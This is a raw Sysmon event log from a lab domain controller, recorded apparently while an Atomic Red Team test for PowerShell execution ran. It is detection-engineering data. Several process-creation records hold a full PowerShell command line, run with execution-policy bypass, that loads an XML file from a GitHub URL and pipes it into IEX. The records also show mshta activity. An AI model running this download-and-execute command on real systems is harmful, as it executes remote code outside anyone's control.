ntdll.dll+51821 10341000x80000000000000002244264Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.405{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6E3D-603E-02AB-00000000AD01}8280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002244263Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.389{05ADC7E1-6E3D-603E-01AB-00000000AD01}111769840C:\Windows\system32\cmd.exe{05ADC7E1-6E3D-603E-02AB-00000000AD01}8280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002244262Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.404{05ADC7E1-6E3D-603E-02AB-00000000AD01}8280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.xml');$Xml.command.a.execute | IEX" C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6E3D-603E-01AB-00000000AD01}11176C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.xml');$Xml.command.a.execute | IEX"" 10341000x80000000000000002244261Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.389{05ADC7E1-6CB1-603E-35AA-00000000AD01}148289956C:\Windows\system32\conhost.exe{05ADC7E1-6E3D-603E-01AB-00000000AD01}11176C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244260Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.389{05ADC7E1-6CB1-603E-34AA-00000000AD01}1169612080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-6E3D-603E-01AB-00000000AD01}11176C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3ed3|UNKNOWN(00007FF829F94433) 10341000x80000000000000002244259Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.389{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244258Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.389{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244257Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.389{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244256Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.389{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244255Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.389{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6E3D-603E-01AB-00000000AD01}11176C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002244254Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.389{05ADC7E1-6CB1-603E-34AA-00000000AD01}1169612080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-6E3D-603E-01AB-00000000AD01}11176C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+fffcffed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+fffcffed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+fffcffed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+fffcffed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3743(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b35b7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f535de3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4ac19f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65392(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f474997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4d2e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4a82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4e1471(wow64) 154100x80000000000000002244253Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.389{05ADC7E1-6E3D-603E-01AB-00000000AD01}11176C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.xml');$Xml.command.a.execute | IEX"" C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x80000000000000002244252Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.373{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-err.txt2021-03-02 16:56:11.776 11241100x80000000000000002244251Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.373{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-out.txt2021-03-02 16:56:11.773 23542300x80000000000000002244250Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.123{05ADC7E1-6E3C-603E-00AB-00000000AD01}4224ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245144Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:30.905{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=3CC9C99D85B549A05D1DF74FCA8B0CEE,SHA256=1140B2F73BCCC1968BFB3D904DD415C40AFCB40B8140A87BF6E14EE579A0C3D2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002245143Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:30.875{05ADC7E1-229F-6039-1200-00000000AD01}11601960C:\Windows\system32\svchost.exe{05ADC7E1-6E3E-603E-05AB-00000000AD01}3592C:\Windows\system32\mshta.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245142Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:30.874{05ADC7E1-229F-6039-1200-00000000AD01}11601960C:\Windows\system32\svchost.exe{05ADC7E1-6E3E-603E-05AB-00000000AD01}3592C:\Windows\system32\mshta.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002245141Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:30.858{05ADC7E1-29F2-6039-CE05-00000000AD01}2464ATTACKRANGE\AdministratorC:\Windows\system32\taskhostw.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\IE\9LYUFICW\warning[1]MD5=124A9E7B6976F7570134B7034EE28D2B,SHA256=5F95EFF2BCAAEA82D0AE34A007DE3595C0D830AC4810EA4854E6526E261108E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245140Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:30.858{05ADC7E1-6E3E-603E-05AB-00000000AD01}3592ATTACKRANGE\AdministratorC:\Windows\system32\mshta.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\IE\BAPG9VIH\warning[1]MD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002245139Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:30.858{05ADC7E1-229F-6039-1200-00000000AD01}11601960C:\Windows\system32\svchost.exe{05ADC7E1-6E3E-603E-05AB-00000000AD01}3592C:\Windows\system32\mshta.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002245138Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:30.842{05ADC7E1-29F2-6039-CE05-00000000AD01}2464ATTACKRANGE\AdministratorC:\Windows\system32\taskhostw.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\IE\BAPG9VIH\error[1]MD5=B9BEC45642FF7A2588DC6CB4131EA833,SHA256=B0ABE318200DCDE42E2125DF1F0239AE1EFA648C742DBF9A5B0D3397B903C21D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245137Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:30.842{05ADC7E1-6E3E-603E-05AB-00000000AD01}3592ATTACKRANGE\AdministratorC:\Windows\system32\mshta.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\IE\U8AQOFTC\error[1]MD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245136Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:30.733{05ADC7E1-29F2-6039-CE05-00000000AD01}2464ATTACKRANGE\AdministratorC:\Windows\system32\taskhostw.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\IE\U8AQOFTC\error[1]MD5=16AA7C3BEBF9C1B84C9EE07666E3207F,SHA256=7990E703AE060C241EBA6257D963AF2ECF9C6F3FBDB57264C1D48DDA8171E754,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245135Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:30.733{05ADC7E1-6E3E-603E-05AB-00000000AD01}3592ATTACKRANGE\AdministratorC:\Windows\system32\mshta.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\IE\9UN38420\error[1]MD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002245134Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:30.573{05ADC7E1-229F-6039-0D00-00000000AD01}62014144C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245133Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:30.573{05ADC7E1-229F-6039-0D00-00000000AD01}62014144C:\Windows\system32\svchost.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000002245132Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:20.081{00000000-0000-0000-0000-000000000000}4224<unknown process>-tcptruefalse10.0.1.14win-dc-974.attackrange.local60194-false185.199.109.133cdn-185-199-109-133.github.com443https 354300x80000000000000002245131Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:19.379{00000000-0000-0000-0000-000000000000}6296<unknown process>-tcptruefalse10.0.1.14win-dc-974.attackrange.local60193-false185.199.109.133cdn-185-199-109-133.github.com443https 10341000x80000000000000002245130Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:30.409{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245129Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:30.293{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-6E3E-603E-05AB-00000000AD01}3592C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245128Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:30.291{05ADC7E1-29F2-6039-CE05-00000000AD01}24643672C:\Windows\system32\taskhostw.exe{05ADC7E1-6E3E-603E-05AB-00000000AD01}3592C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245127Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:30.291{05ADC7E1-29F2-6039-CE05-00000000AD01}24643672C:\Windows\system32\taskhostw.exe{05ADC7E1-6E3E-603E-05AB-00000000AD01}3592C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245126Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:30.289{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014764C:\Windows\explorer.exe{05ADC7E1-6E3E-603E-05AB-00000000AD01}3592C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aecdf|C:\Windows\System32\SHELL32.dll+b0420|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245125Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:30.288{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014764C:\Windows\explorer.exe{05ADC7E1-6E3E-603E-05AB-00000000AD01}3592C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+95ad0|C:\Windows\System32\SHELL32.dll+b03dc|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245124Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 